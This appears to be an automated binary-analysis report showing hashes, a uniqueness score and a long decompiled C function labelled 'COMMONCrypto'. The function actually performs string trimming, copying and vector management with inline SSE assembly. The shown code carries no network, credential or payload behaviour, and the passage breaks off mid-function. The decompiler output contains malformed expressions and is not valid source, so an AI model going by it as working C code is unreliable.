Opcode ID: 8b05dd01504709d93bbdfbd519dd0243ce9c915754ae850f6ceffd7bab289703
Instruction ID: de7abff580ad713df12c6830c839f08f01235639a1520ff8fe8b298f2485342b
Opcode Fuzzy Hash: 8b05dd01504709d93bbdfbd519dd0243ce9c915754ae850f6ceffd7bab289703
Instruction Fuzzy Hash: 5AE23F315183809AD334EFB8E999AEFB3E8AFE5314F104E2DD189471A0EF316955CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6E7A3EC0, Relevance: 2.4, Strings: 1, Instructions: 1131
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E6E7A3EC0(signed int __ecx) {
				char _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				unsigned int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _t368;
				unsigned int _t371;
				void* _t376;
				signed int* _t377;
				char* _t378;
				char _t381;
				signed int _t382;
				signed int _t388;
				signed int _t392;
				signed int _t393;
				signed int _t396;
				char* _t397;
				char _t400;
				char _t403;
				signed int _t404;
				signed int _t407;
				signed int _t410;
				signed int _t412;
				void* _t413;
				char* _t416;
				signed int _t418;
				unsigned int _t424;
				signed int _t425;
				char* _t431;
				signed int _t436;
				unsigned int _t442;
				char* _t445;
				void* _t447;
				char _t449;
				signed int _t450;
				signed int _t451;
				char* _t463;
				char _t477;
				char _t479;
				char _t481;
				char _t482;
				signed int _t483;
				signed int _t484;
				char _t491;
				signed int _t492;
				void* _t503;
				signed int _t508;
				unsigned int _t509;
				signed int _t511;
				signed int _t512;
				signed int _t520;
				char* _t521;
				char* _t522;
				char* _t523;
				signed int _t524;
				signed int _t527;
				char* _t535;
				signed int _t537;
				unsigned int _t543;
				signed int _t545;
				signed int _t546;
				char _t548;
				char _t549;
				char _t550;
				signed int _t551;
				signed int _t552;
				unsigned int _t556;
				void* _t565;
				signed int _t566;
				char* _t568;
				char _t569;
				char _t570;
				signed int _t571;
				signed int _t573;
				signed int _t574;
				unsigned int _t575;
				char* _t576;
				char _t577;
				char _t578;
				char* _t583;
				char _t584;
				char _t585;
				signed int _t586;
				unsigned int _t592;
				void* _t595;
				signed int _t597;
				signed int _t600;
				char _t602;
				void* _t603;
				unsigned int _t604;
				signed int _t605;
				unsigned int _t610;
				signed int _t612;
				signed int _t614;
				char* _t615;
				char _t616;
				char _t617;
				char _t620;
				signed int _t621;
				void* _t624;
				signed int _t626;
				char _t629;
				signed int _t630;
				signed int _t636;
				signed int _t641;
				char* _t642;
				char _t644;
				signed int _t646;
				char _t649;
				signed int _t650;
				signed int _t652;
				signed int _t654;
				signed int _t655;
				signed int _t658;
				char* _t659;
				void* _t660;
				void* _t665;
				intOrPtr _t667;
				signed int _t672;
				signed int _t673;
				unsigned int _t675;
				signed int _t676;
				signed int _t677;
				signed int _t678;
				signed int _t680;
				intOrPtr* _t681;
				signed int _t682;
				unsigned int* _t683;
				signed int _t685;
				signed int _t686;
				void* _t688;
				signed int _t689;
				signed int _t693;
				signed int _t694;
				char* _t695;
				void* _t696;
				unsigned int _t697;
				signed int _t700;
				unsigned int _t702;
				signed int _t704;
				intOrPtr* _t705;
				signed int _t707;
				signed int _t714;
				void* _t720;
				signed int _t721;
				void* _t723;
				void* _t727;

				_t723 = (_t721 & 0xfffffff0) - 0x44;
				_t505 = __ecx;
				_t727 =  *__ecx;
				if(_t727 == 0) {
					return __ecx;
				} else {
					if(_t727 <= 0) {
						_v48 = 0;
						_t604 = 0;
						if( &_v52 == __ecx) {
							goto L288;
						} else {
							goto L287;
						}
					} else {
						_v64 = 0;
						asm("pxor xmm0, xmm0");
						_v40 = __ecx;
						do {
							_t410 = _v64 + 1;
							_t620 =  *0x6e7ba24c; // 0xa0d0920
							_t550 =  *0x6e7ba250; // 0x0
							_v64 = _t410;
							_v36 = _t620;
							_v32 = _t550;
							_t621 =  *( *( *((intOrPtr*)(_v40 + 4)) + _t410 * 4 - 4));
							if(_t621 == 0) {
								_t680 = 0;
								_t412 = 0;
							} else {
								_t505 = _t621 & 0x0000000f;
								if(_t505 == 0) {
									L8:
									asm("pxor xmm1, xmm1");
									_t503 =  ~( ~_t505 + 0x0000000f & 0x0000000f) + 0x7fffffff;
									while(1) {
										asm("movdqu xmm0, [edx+ebx]");
										asm("pcmpeqb xmm0, xmm1");
										asm("pmovmskb ecx, xmm0");
										if(_t550 != 0) {
											break;
										}
										_t505 = _t505 + 0x10;
										if(_t505 < _t503) {
											continue;
										} else {
											if(_t503 >= 0x7fffffff) {
												L14:
												_t412 = 0x7fffffff;
												goto L15;
											} else {
												while( *((char*)(_t503 + _t621)) != 0) {
													_t503 = _t503 + 1;
													if(_t503 < 0x7fffffff) {
														continue;
													} else {
														goto L14;
													}
													goto L20;
												}
												goto L295;
											}
										}
										goto L20;
									}
									asm("bsf eax, ecx");
									_t412 = _t503 + _t505;
									goto L295;
								} else {
									_t412 = 0;
									_t505 =  ~_t505 + 0x10;
									while( *((char*)(_t412 + _t621)) != 0) {
										_t412 = _t412 + 1;
										if(_t412 < _t505) {
											continue;
										} else {
											goto L8;
										}
										goto L20;
									}
									L295:
									if(_t412 > 0) {
										L15:
										_t505 = _v36;
										_t680 = 0;
										while(_t505 != 0) {
											while(1) {
												_t720 = _t720 + 1;
												if(_t603 ==  *((intOrPtr*)(_t723 + _t720 + 0x2f))) {
													break;
												}
												if( *((char*)(_t723 + _t720 + 0x30)) != 0) {
													continue;
												}
												goto L20;
											}
											_t680 = _t680 + 1;
											if(_t680 < _t412) {
												continue;
											} else {
												goto L20;
											}
											goto L301;
										}
									} else {
										_t680 = 0;
									}
								}
							}
							L20:
							_t413 = _t412 - 1;
							_t700 = _t412 - _t680;
							if(_t413 >= _t680) {
								_v60 = 0;
								_t505 = _t413 - _t680 + 1;
								_v56 = _t680;
								_t602 = _v36;
								_t689 = _v60;
								_v48 = _t621;
								_v52 = _t505;
								while(_t602 != 0) {
									_t667 =  *((intOrPtr*)(_t413 + _v48));
									while(1) {
										_t505 = 1;
										if(_t667 ==  *((intOrPtr*)(_t723 + 0x30))) {
											break;
										}
										if( *((char*)(_t723 + 0x31)) != 0) {
											continue;
										}
										goto L26;
									}
									_t689 = _t689 + 1;
									_t413 = _t413 - 1;
									_t700 = _t700 - 1;
									if(_t689 < _v52) {
										continue;
									} else {
										break;
									}
									goto L301;
								}
								L26:
								_t621 = _v48;
								_t680 = _v56;
							}
							if(_t700 == 0) {
								L66:
								_push(0x40);
								_t505 = E6E791030();
								_t723 = _t723 + 4;
								 *_t505 = 0;
							} else {
								if(_t621 == 0) {
									_t483 = 0;
								} else {
									_t600 = _t621 & 0x0000000f;
									if(_t600 == 0) {
										L33:
										asm("pxor xmm1, xmm1");
										_t483 =  ~( ~_t600 + 0x0000000f & 0x0000000f) + 0x7fffffff;
										while(1) {
											asm("movdqu xmm0, [edx+ecx]");
											asm("pcmpeqb xmm0, xmm1");
											asm("pmovmskb ebx, xmm0");
											if(_t505 != 0) {
												break;
											}
											_t600 = _t600 + 0x10;
											if(_t600 < _t483) {
												continue;
											} else {
												if(_t483 >= 0x7fffffff) {
													L39:
													_t483 = 0x7fffffff;
												} else {
													while( *((char*)(_t483 + _t621)) != 0) {
														_t483 = _t483 + 1;
														if(_t483 < 0x7fffffff) {
															continue;
														} else {
															goto L39;
														}
														goto L40;
													}
												}
											}
											goto L40;
										}
										asm("bsf eax, ebx");
										_t483 = _t483 + _t600;
									} else {
										_t483 = 0;
										_t600 =  ~_t600 + 0x10;
										while( *((char*)(_t483 + _t621)) != 0) {
											_t483 = _t483 + 1;
											if(_t483 < _t600) {
												continue;
											} else {
												goto L33;
											}
											goto L40;
										}
									}
								}
								L40:
								_t687 =  <=  ? 0 : _t680;
								_t688 =  <  ? _t483 :  <=  ? 0 : _t680;
								_t484 = _t483 - _t688;
								if(_t700 < 0 || _t700 > _t484) {
									_t700 = _t484;
								}
								if(_t688 + _t621 == 0 ||  *(_t621 + _t688) == 0) {
									goto L66;
								} else {
									if(_t700 == 0) {
										_t492 = _t621 + _t688;
										_t597 = _t492 & 0x0000000f;
										if(_t597 == 0) {
											L50:
											asm("pxor xmm1, xmm1");
											_t700 =  ~( ~_t597 + 0x0000000f & 0x0000000f) + 0x7fffffff;
											while(1) {
												asm("movdqu xmm0, [eax+ecx]");
												asm("pcmpeqb xmm0, xmm1");
												asm("pmovmskb ebx, xmm0");
												if(_t505 != 0) {
													break;
												}
												_t597 = _t597 + 0x10;
												if(_t597 < _t700) {
													continue;
												} else {
													if(_t700 >= 0x7fffffff) {
														L56:
														_t700 = 0x7fffffff;
													} else {
														while( *((char*)(_t700 + _t492)) != 0) {
															_t700 = _t700 + 1;
															if(_t700 < 0x7fffffff) {
																continue;
															} else {
																goto L56;
															}
															goto L57;
														}
													}
												}
												goto L57;
											}
											asm("bsf esi, ebx");
											_t700 = _t700 + _t597;
										} else {
											_t700 = 0;
											_t597 =  ~_t597 + 0x10;
											while( *((char*)(_t700 + _t492)) != 0) {
												_t700 = _t700 + 1;
												if(_t700 < _t597) {
													continue;
												} else {
													goto L50;
												}
												goto L57;
											}
										}
									}
									L57:
									_t40 = _t700 + 1; // -2147483661
									_t511 =  <=  ? 0x40 : _t40;
									if(_t511 > 0) {
										_t592 = (_t511 >> 5 >> 0x1a) + _t511 >> 6;
										_t512 = _t511 & 0x8000003f;
										if(_t512 < 0) {
											_t512 = (_t512 - 0x00000001 | 0xffffffc0) + 1;
										}
										_push(_t592 + (0 | _t512 > 0x00000000) << 6);
										_v48 = _t621;
										_t505 = E6E791030();
										_t723 = _t723 + 4;
										_t665 = _v48 + _t688;
										_t595 = 0;
										 *_t505 = 0;
										while(1) {
											_t595 = _t595 + 1;
											_t491 =  *((char*)(_t595 + _t665 - 1));
											 *((char*)(_t595 + _t505 - 1)) = _t491;
											if(_t700 != 0 && _t595 == _t700) {
												break;
											}
											if(_t491 != 0) {
												continue;
											} else {
											}
											goto L67;
										}
										 *((char*)(_t595 + _t505)) = 0;
									} else {
										_t505 = 0;
									}
								}
							}
							L67:
							_t551 = _v64;
							_t681 =  *((intOrPtr*)( *((intOrPtr*)(_v40 + 4)) + _t551 * 4 - 4));
							_t416 =  *_t681;
							if(_t416 != _t505) {
								if(_t505 == 0 ||  *_t505 == 0) {
									if(_t416 != 0) {
										 *_t416 = 0;
									}
									if( *(_t681 + 4) < 0x40) {
										_push(0x40);
										_v72 = E6E791030();
										_t723 = _t723 + 4;
										_t463 =  *_t681;
										if(_t463 == 0) {
											 *_v72 = 0;
										} else {
											if(_v72 != 0) {
												_t583 = _v72;
												_t649 =  *_t463;
												 *_t583 = _t649;
												if(_t649 != 0) {
													_v84 = _t505;
													_t650 = 0;
													_t523 = _t583;
													while(1) {
														_t650 = _t650 + 1;
														_t584 =  *((char*)(_t463 + _t650 * 2 - 1));
														 *((char*)(_t523 + _t650 * 2 - 1)) = _t584;
														if(_t584 == 0) {
															break;
														}
														_t585 =  *((char*)(_t463 + _t650 * 2));
														 *((char*)(_t523 + _t650 * 2)) = _t585;
														if(_t585 != 0) {
															continue;
														}
														break;
													}
													_t505 = _v84;
												}
												_t463 =  *_t681;
											}
											_push(1);
											_push(_t463);
											E6E7910B0();
											_t723 = _t723 + 8;
										}
										 *_t681 = _v72;
										 *(_t681 + 4) = 0x40;
									}
								} else {
									_t652 = _t505 & 0x0000000f;
									if(_t652 == 0) {
										L74:
										asm("pxor xmm1, xmm1");
										_t714 =  ~( ~_t652 + 0x0000000f & 0x0000000f) + 0x7fffffff;
										while(1) {
											asm("movdqu xmm0, [ebx+edx]");
											asm("pcmpeqb xmm0, xmm1");
											asm("pmovmskb ecx, xmm0");
											if(_t551 != 0) {
												break;
											}
											_t652 = _t652 + 0x10;
											if(_t652 < _t714) {
												continue;
											} else {
												if(_t714 >= 0x7fffffff) {
													L80:
													_t714 = 0x7fffffff;
												} else {
													while( *((char*)(_t714 + _t505)) != 0) {
														_t714 = _t714 + 1;
														if(_t714 < 0x7fffffff) {
															continue;
														} else {
															goto L80;
														}
														goto L81;
													}
													goto L270;
												}
											}
											goto L81;
										}
										asm("bsf esi, ecx");
										_t714 = _t714 + _t652;
										goto L270;
									} else {
										_t714 = 0;
										_t652 =  ~_t652 + 0x10;
										while( *((char*)(_t714 + _t505)) != 0) {
											_t714 = _t714 + 1;
											if(_t714 < _t652) {
												continue;
											} else {
												goto L74;
											}
											goto L81;
										}
										L270:
										if(_t714 == 0xffffffff && _t416 != 0) {
											 *_t416 = 0;
										}
									}
									L81:
									_t57 = _t714 + 1; // -2147483661
									_t654 =  <=  ? 0x40 : _t57;
									if(_t654 >  *(_t681 + 4)) {
										_v68 = (_t654 >> 5 >> 0x1a) + _t654 >> 6;
										_t655 = _t654 & 0x8000003f;
										if(_t655 < 0) {
											_t655 = (_t655 - 0x00000001 | 0xffffffc0) + 1;
										}
										_t658 = _v68 + (0 | _t655 > 0x00000000) << 6;
										_v68 = _t658;
										_push(_t658);
										_t586 = E6E791030();
										_t723 = _t723 + 4;
										_t659 =  *_t681;
										if(_t659 == 0) {
											 *_t586 = 0;
										} else {
											if(_t586 != 0) {
												_t479 =  *_t659;
												 *_t586 = _t479;
												if(_t479 != 0) {
													_v80 = _t681;
													_v84 = _t505;
													_t524 = 0;
													while(1) {
														_t524 = _t524 + 1;
														_t481 =  *((char*)(_t659 + _t524 * 2 - 1));
														 *((char*)(_t586 + _t524 * 2 - 1)) = _t481;
														if(_t481 == 0) {
															break;
														}
														_t482 =  *((char*)(_t659 + _t524 * 2));
														 *((char*)(_t586 + _t524 * 2)) = _t482;
														if(_t482 != 0) {
															continue;
														}
														break;
													}
													_t681 = _v80;
													_t505 = _v84;
												}
												_t659 =  *_t681;
											}
											_push(1);
											_push(_t659);
											_v76 = _t586;
											E6E7910B0();
											_t586 = _v76;
											_t723 = _t723 + 8;
										}
										 *(_t681 + 4) = _v68;
										 *_t681 = _t586;
									} else {
										_t586 =  *_t681;
									}
									if(_t586 != 0 && _t505 != 0) {
										_t660 = 0;
										while(1) {
											_t660 = _t660 + 1;
											_t477 =  *((char*)(_t660 + _t505 - 1));
											 *((char*)(_t660 + _t586 - 1)) = _t477;
											if(_t714 != 0 && _t660 == _t714) {
												break;
											}
											if(_t477 != 0) {
												continue;
											} else {
											}
											goto L117;
										}
										 *((char*)(_t660 + _t586)) = 0;
									}
								}
							}
							L117:
							_push(1);
							_push(_t505);
							E6E7910B0();
							_t723 = _t723 + 8;
							_t418 = _v40;
							_t552 =  *_t418;
						} while (_t552 > _v64);
						_t505 = _t418;
						_t604 = 0;
						_v48 = 0;
						asm("pxor xmm0, xmm0");
						if(_t552 <= 0) {
							if( &_v52 == _t505) {
								L288:
								_v52 = _t604;
								_v44 = _t604;
							} else {
								L287:
								_v44 = _t604;
								_v52 = _t604;
								 *_t505 = _t604;
								 *(_t505 + 8) = _t604;
								goto L196;
							}
						} else {
							_t371 = 0;
							_v44 = 0;
							_t682 = 0;
							_v60 = _t552;
							_v40 = _t505;
							do {
								_t682 = _t682 + 1;
								_t520 =  *( *( *((intOrPtr*)(_v40 + 4)) + _t682 * 4 - 4));
								if(_t520 != 0) {
									_t704 = _t520 & 0x0000000f;
									if(_t704 == 0) {
										L125:
										asm("pxor xmm1, xmm1");
										_v56 = _t682;
										_t565 =  ~( ~_t704 + 0x0000000f & 0x0000000f) + 0x7fffffff;
										while(1) {
											asm("movdqu xmm0, [ebx+esi]");
											asm("pcmpeqb xmm0, xmm1");
											asm("pmovmskb edi, xmm0");
											if(_t682 != 0) {
												break;
											}
											_t704 = _t704 + 0x10;
											if(_t704 < _t565) {
												continue;
											} else {
												_t682 = _v56;
												if(_t565 >= 0x7fffffff) {
													goto L131;
												} else {
													while( *((char*)(_t565 + _t520)) != 0) {
														_t565 = _t565 + 1;
														if(_t565 < 0x7fffffff) {
															continue;
														} else {
															goto L131;
														}
														goto L182;
													}
													goto L284;
												}
											}
											goto L182;
										}
										_t566 = _t682;
										asm("bsf ecx, ecx");
										_t682 = _v56;
										_t565 = _t566 + _t704;
										goto L284;
									} else {
										_t565 = 0;
										_t704 =  ~_t704 + 0x10;
										while( *((char*)(_t565 + _t520)) != 0) {
											_t565 = _t565 + 1;
											if(_t565 < _t704) {
												continue;
											} else {
												goto L125;
											}
											goto L182;
										}
										L284:
										if(_t565 != 0) {
											L131:
											_v52 = _t604;
											_t624 =  >  ? _t371 : 0;
											_t625 =  >=  ? _t371 : _t624;
											_v64 =  >=  ? _t371 : _t624;
											_t626 = _v44;
											if(_t371 == _t626) {
												_v44 = _t626 + 4;
												_push(0x10 + _t626 * 4);
												_t707 = E6E791030();
												E6E790C10(_t707, _v48, _v52 << 2);
												_push(4);
												_push(_v48);
												E6E7910B0();
												_t723 = _t723 + 0x18;
												_v48 = _t707;
												_t371 = _v52;
											}
											_t419 = _t371 != _v64;
											if(_t371 != _v64) {
												E6E790BC0(_v48 + _v64 * 4 + 4, _v48 + _v64 * 4, _t419 << 2);
												_t723 = _t723 + 0xc;
											}
											_push(8);
											_t705 = E6E791030();
											_t723 = _t723 + 4;
											if(_t705 == 0) {
												_t705 = 0;
											} else {
												 *_t705 = 0;
												 *(_t705 + 4) = 0;
												if(_t520 == 0 ||  *_t520 == 0) {
													_push(0x40);
													_v80 = E6E791030();
													_t723 = _t723 + 4;
													_t431 =  *_t705;
													if(_t431 == 0) {
														 *_v80 = 0;
													} else {
														if(_v80 != 0) {
															_t568 = _v80;
															_t629 =  *_t431;
															 *_t568 = _t629;
															if(_t629 != 0) {
																_v56 = _t682;
																_t630 = 0;
																_t521 = _t568;
																while(1) {
																	_t630 = _t630 + 1;
																	_t569 =  *((char*)(_t431 + _t630 * 2 - 1));
																	 *((char*)(_t521 + _t630 * 2 - 1)) = _t569;
																	if(_t569 == 0) {
																		break;
																	}
																	_t570 =  *((char*)(_t431 + _t630 * 2));
																	 *((char*)(_t521 + _t630 * 2)) = _t570;
																	if(_t570 != 0) {
																		continue;
																	}
																	break;
																}
																_t682 = _v56;
															}
														}
														_push(1);
														_push(_t431);
														E6E7910B0();
														_t723 = _t723 + 8;
													}
													 *_t705 = _v80;
													 *(_t705 + 4) = 0x40;
												} else {
													_t436 = _t520 & 0x0000000f;
													if(_t436 == 0) {
														L142:
														asm("pxor xmm1, xmm1");
														_t636 =  ~( ~_t436 + 0x0000000f & 0x0000000f) + 0x7fffffff;
														_v72 = _t636;
														_t571 = _t636;
														while(1) {
															asm("movdqu xmm0, [ebx+eax]");
															asm("pcmpeqb xmm0, xmm1");
															asm("pmovmskb edx, xmm0");
															if(_t636 != 0) {
																break;
															}
															_t436 = _t436 + 0x10;
															if(_t436 < _t571) {
																continue;
															} else {
																_v72 = _t571;
																if(_v72 >= 0x7fffffff) {
																	L149:
																	_v72 = 0x7fffffff;
																} else {
																	_t451 = _t571;
																	while( *((char*)(_t451 + _t520)) != 0) {
																		_t451 = _t451 + 1;
																		if(_t451 < 0x7fffffff) {
																			continue;
																		} else {
																			goto L149;
																		}
																		goto L150;
																	}
																	_v72 = _t451;
																}
															}
															goto L150;
														}
														asm("bsf edx, edx");
														_v72 = _t636 + _t436;
													} else {
														_v72 = 0;
														_t646 = _v72;
														_t436 =  ~_t436 + 0x10;
														while( *((char*)(_t646 + _t520)) != 0) {
															_t646 = _t646 + 1;
															if(_t646 < _t436) {
																continue;
															} else {
																goto L142;
															}
															goto L150;
														}
														_v72 = _t646;
													}
													L150:
													_t143 = _v72 + 1; // 0x80000000
													_t573 =  <=  ? 0x40 : _t143;
													if(_t573 > 0) {
														_t442 = (_t573 >> 5 >> 0x1a) + _t573 >> 6;
														_v76 = _t442;
														_t574 = _t573 & 0x8000003f;
														if(_t574 < 0) {
															_t574 = (_t574 - 0x00000001 | 0xffffffc0) + 1;
														}
														_t641 = _t442 + (0 | _t574 > 0x00000000) << 6;
														_v76 = _t641;
														_push(_t641);
														_t445 = E6E791030();
														_v68 = _t445;
														_t723 = _t723 + 4;
														_t642 =  *_t705;
														if(_t642 == 0) {
															 *_t445 = 0;
														} else {
															if(_v68 != 0) {
																_t576 = _t445;
																_t449 =  *_t642;
																 *_t576 = _t449;
																if(_t449 != 0) {
																	_v84 = _t520;
																	_t450 = 0;
																	_v56 = _t682;
																	_t522 = _t576;
																	while(1) {
																		_t450 = _t450 + 1;
																		_t577 =  *((char*)(_t642 + _t450 * 2 - 1));
																		 *((char*)(_t522 + _t450 * 2 - 1)) = _t577;
																		if(_t577 == 0) {
																			break;
																		}
																		_t578 =  *((char*)(_t642 + _t450 * 2));
																		 *((char*)(_t522 + _t450 * 2)) = _t578;
																		if(_t578 != 0) {
																			continue;
																		}
																		break;
																	}
																	_t520 = _v84;
																	_t682 = _v56;
																}
															}
															_push(1);
															_push(_t642);
															E6E7910B0();
															_t723 = _t723 + 8;
														}
														 *(_t705 + 4) = _v76;
														 *_t705 = _v68;
													} else {
														_v68 = 0;
													}
													if(_v68 != 0) {
														_v56 = _t682;
														_t447 = 0;
														_t575 = _v68;
														_t686 = _v72;
														while(1) {
															_t447 = _t447 + 1;
															_t644 =  *((char*)(_t447 + _t520 - 1));
															 *((char*)(_t447 + _t575 - 1)) = _t644;
															if(_t686 != 0 && _t447 == _t686) {
																break;
															}
															if(_t644 != 0) {
																continue;
															} else {
																_t682 = _v56;
															}
															goto L181;
														}
														_t682 = _v56;
														 *((char*)(_t447 + _v68)) = 0;
													}
												}
											}
											L181:
											 *((intOrPtr*)(_v48 + _v64 * 4)) = _t705;
											_t371 = _v52 + 1;
											_v60 =  *_v40;
											_t604 = _t371;
										} else {
										}
									}
								}
								L182:
							} while (_t682 < _v60);
							_t505 = _v40;
							_t683 =  &_v52;
							_t556 =  *(_t683 - 8);
							if(_t683 == _t505) {
								L253:
								_v52 = 0;
								_v44 = 0;
								_t604 = _v48;
								if(_t371 > 0) {
									_t675 = _t371 >> 1;
									if(_t675 == 0) {
										_t676 = 1;
									} else {
										_v40 = _t505;
										_t509 = _t371;
										_t694 = 0;
										do {
											_t532 =  *((intOrPtr*)(_t604 + _t694 * 8));
											if( *((intOrPtr*)(_t604 + _t694 * 8)) != 0) {
												_push(1);
												E6E7987B0(_t532);
												_t604 = _v52;
											}
											_t533 =  *((intOrPtr*)(_t604 + 4 + _t694 * 8));
											if( *((intOrPtr*)(_t604 + 4 + _t694 * 8)) != 0) {
												_push(1);
												E6E7987B0(_t533);
												_t604 = _v52;
											}
											_t694 = _t694 + 1;
										} while (_t694 < _t675);
										_t534 = _t694;
										_t371 = _t509;
										_t505 = _v40;
										_t333 = _t534 + 1; // 0x2
										_t676 = _t694 + _t333;
									}
									_t334 = _t676 - 1; // 0x1
									if(_t334 < _t371) {
										_t530 =  *((intOrPtr*)(_t604 + _t676 * 4 - 4));
										if( *((intOrPtr*)(_t604 + _t676 * 4 - 4)) != 0) {
											_push(1);
											E6E7987B0(_t530);
											_t604 = _v52;
										}
									}
								}
							} else {
								_v52 = _t604;
								 *_t505 = 0;
								 *(_t505 + 8) = 0;
								if(_t556 <= 0) {
									L196:
									_t605 =  *(_t505 + 4);
								} else {
									_t605 =  *(_t505 + 4);
									_t424 = _t556 >> 1;
									if(_t424 == 0) {
										_t425 = 1;
									} else {
										_v60 = _t556;
										_t685 = 0;
										_t702 = _t424;
										do {
											_t558 =  *((intOrPtr*)(_t605 + _t685 * 8));
											if( *((intOrPtr*)(_t605 + _t685 * 8)) != 0) {
												_push(1);
												E6E7987B0(_t558);
												_t605 =  *(_t505 + 4);
											}
											_t559 =  *((intOrPtr*)(_t605 + 4 + _t685 * 8));
											if( *((intOrPtr*)(_t605 + 4 + _t685 * 8)) != 0) {
												_push(1);
												E6E7987B0(_t559);
												_t605 =  *(_t505 + 4);
											}
											_t685 = _t685 + 1;
										} while (_t685 < _t702);
										_t556 = _v60;
										_t217 = _t685 + 1; // 0x2
										_t425 = _t685 + _t217;
									}
									_t218 = _t425 - 1; // 0x1
									if(_t218 < _t556) {
										_t557 =  *((intOrPtr*)(_t605 + _t425 * 4 - 4));
										if( *((intOrPtr*)(_t605 + _t425 * 4 - 4)) != 0) {
											_push(1);
											E6E7987B0(_t557);
											goto L196;
										}
									}
								}
								_push(4);
								_push(_t605);
								E6E7910B0();
								_t723 = _t723 + 8;
								_t527 = _v52;
								 *(_t505 + 4) = 0;
								if(_t527 != 0) {
									_t672 = (_t527 - 0x00000001 >> 0x00000001 >> 0x0000001e) + _t527 - 0x00000001 & 0xfffffffc;
									_push(0x10 + _t672 * 4);
									 *(_t505 + 8) = _t672 + 4;
									_t368 = E6E791030();
									_t723 = _t723 + 4;
									_t610 = _v52;
									 *(_t505 + 4) = _t368;
									 *_t505 = _t610;
									if(_t610 <= 0) {
										goto L198;
									} else {
										_v40 = _t505;
										_t673 = 0;
										asm("pxor xmm0, xmm0");
										do {
											_push(8);
											_t673 = _t673 + 1;
											_t693 = E6E791030();
											_t723 = _t723 + 4;
											if(_t693 == 0) {
												_t693 = 0;
												_t508 = _t673 * 4;
											} else {
												_t376 = _t673 - 1;
												if(_t376 < 0 || _t376 >= _v52) {
													_t377 = 0;
													_t508 = _t673 * 4;
												} else {
													_t508 = _t673 * 4;
													_t377 =  *(_v48 + _t508 - 4);
												}
												 *_t693 = 0;
												 *(_t693 + 4) = 0;
												_t614 =  *_t377;
												if(_t614 == 0 ||  *_t614 == 0) {
													_push(0x40);
													_t378 = E6E791030();
													_v84 = _t378;
													_t723 = _t723 + 4;
													_t615 =  *_t693;
													if(_t615 == 0) {
														 *_t378 = 0;
													} else {
														if(_v84 != 0) {
															_t535 = _t378;
															_t381 =  *_t615;
															 *_t535 = _t381;
															if(_t381 != 0) {
																_v56 = _t693;
																_t382 = 0;
																_v64 = _t673;
																_t695 = _t535;
																while(1) {
																	_t382 = _t382 + 1;
																	_t548 =  *((char*)(_t615 + _t382 * 2 - 1));
																	 *((char*)(_t695 + _t382 * 2 - 1)) = _t548;
																	if(_t548 == 0) {
																		break;
																	}
																	_t549 =  *((char*)(_t615 + _t382 * 2));
																	 *((char*)(_t695 + _t382 * 2)) = _t549;
																	if(_t549 != 0) {
																		continue;
																	}
																	break;
																}
																_t693 = _v56;
																_t673 = _v64;
															}
														}
														_push(1);
														_push(_t615);
														E6E7910B0();
														_t723 = _t723 + 8;
													}
													 *_t693 = _v84;
													 *(_t693 + 4) = 0x40;
												} else {
													_t537 = _t614 & 0x0000000f;
													if(_t537 == 0) {
														L212:
														asm("pxor xmm1, xmm1");
														_t388 =  ~( ~_t537 + 0x0000000f & 0x0000000f) + 0x7fffffff;
														_v60 = _t388;
														_v64 = _t673;
														_t677 = _t388;
														while(1) {
															asm("movdqu xmm0, [edx+ecx]");
															asm("pcmpeqb xmm0, xmm1");
															asm("pmovmskb eax, xmm0");
															if(_t388 != 0) {
																break;
															}
															_t537 = _t537 + 0x10;
															if(_t537 < _t677) {
																continue;
															} else {
																_v60 = _t677;
																_t673 = _v64;
																if(_v60 >= 0x7fffffff) {
																	L219:
																	_v60 = 0x7fffffff;
																} else {
																	_t407 = _v60;
																	while( *((char*)(_t407 + _t614)) != 0) {
																		_t407 = _t407 + 1;
																		if(_t407 < 0x7fffffff) {
																			continue;
																		} else {
																			goto L219;
																		}
																		goto L220;
																	}
																	goto L279;
																}
															}
															goto L220;
														}
														asm("bsf eax, eax");
														_t673 = _v64;
														_v60 = _t388 + _t537;
													} else {
														_v60 = 0;
														_t407 = _v60;
														_t537 =  ~_t537 + 0x10;
														while( *((char*)(_t407 + _t614)) != 0) {
															_t407 = _t407 + 1;
															if(_t407 < _t537) {
																continue;
															} else {
																goto L212;
															}
															goto L220;
														}
														L279:
														_v60 = _t407;
													}
													L220:
													_t392 =  <=  ? 0x40 : _v60 + 1;
													if(_t392 > 0) {
														_t543 = (_t392 >> 5 >> 0x1a) + _t392 >> 6;
														_v72 = _t543;
														_t393 = _t392 & 0x8000003f;
														if(_t393 < 0) {
															_t393 = (_t393 - 0x00000001 | 0xffffffc0) + 1;
														}
														_t545 = _t543 + (0 | _t393 > 0x00000000) << 6;
														_v72 = _t545;
														_push(_t545);
														_v76 = _t614;
														_t396 = E6E791030();
														_t614 = _v76;
														_t546 = _t396;
														_t723 = _t723 + 4;
														_t397 =  *_t693;
														_v68 = _t397;
														if(_t397 == 0) {
															 *_t546 = 0;
														} else {
															if(_t546 != 0) {
																_t403 =  *_t397;
																 *_t546 = _t403;
																if(_t403 != 0) {
																	_v56 = _t693;
																	_t404 = 0;
																	_v76 = _t614;
																	_v64 = _t673;
																	_t697 = _v68;
																	while(1) {
																		_t404 = _t404 + 1;
																		_t616 =  *((char*)(_t697 + _t404 * 2 - 1));
																		 *((char*)(_t546 + _t404 * 2 - 1)) = _t616;
																		if(_t616 == 0) {
																			break;
																		}
																		_t617 =  *((char*)(_t697 + _t404 * 2));
																		 *((char*)(_t546 + _t404 * 2)) = _t617;
																		if(_t617 != 0) {
																			continue;
																		}
																		break;
																	}
																	_t693 = _v56;
																	_t614 = _v76;
																	_t673 = _v64;
																}
															}
															_push(1);
															_push(_v68);
															_v80 = _t546;
															_v76 = _t614;
															E6E7910B0();
															_t614 = _v76;
															_t546 = _v80;
															_t723 = _t723 + 8;
														}
														 *(_t693 + 4) = _v72;
														 *_t693 = _t546;
													} else {
														_t546 = 0;
													}
													if(_t546 != 0) {
														_v64 = _t673;
														_v56 = _t693;
														_t696 = 0;
														_t678 = _v60;
														while(1) {
															_t696 = _t696 + 1;
															_t400 =  *((char*)(_t696 + _t614 - 1));
															 *((char*)(_t696 + _t546 - 1)) = _t400;
															if(_t678 != 0 && _t696 == _t678) {
																break;
															}
															if(_t400 != 0) {
																continue;
															} else {
